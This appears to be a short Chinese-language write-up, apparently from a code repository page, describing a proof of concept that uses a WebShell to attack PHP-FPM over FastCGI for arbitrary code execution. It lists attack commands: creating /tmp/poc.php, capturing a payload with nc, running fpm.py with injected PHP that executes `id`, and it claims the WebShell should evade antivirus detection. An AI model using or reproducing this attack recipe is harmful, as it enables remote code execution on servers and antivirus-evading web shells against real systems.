用WebShell攻击PHP-FPM
来自大佬的文末一个想法
快速实现了一个poc,可以实现任意代码执行
后续用单文件PHP实现一个FastCgi Client,然后已知PHP文件就用WebShell本身,没有什么骚操作的话WebShell应该就是免杀的
使用
测试php7.3-fpm,在TCP模式和本地socket都可以运行
echo "<?php echo 1; ?>" > /tmp/poc.php
nc -lvp 6666 > payload.txt
python fpm.py -c '<?php echo `id`; exit;?>' -p 6666 127.0.0.1 /tmp/poc.php
运行poc.php
php poc.php
参考
fpm.py来自
2021-03-11 15:07:38
176KB
Python
1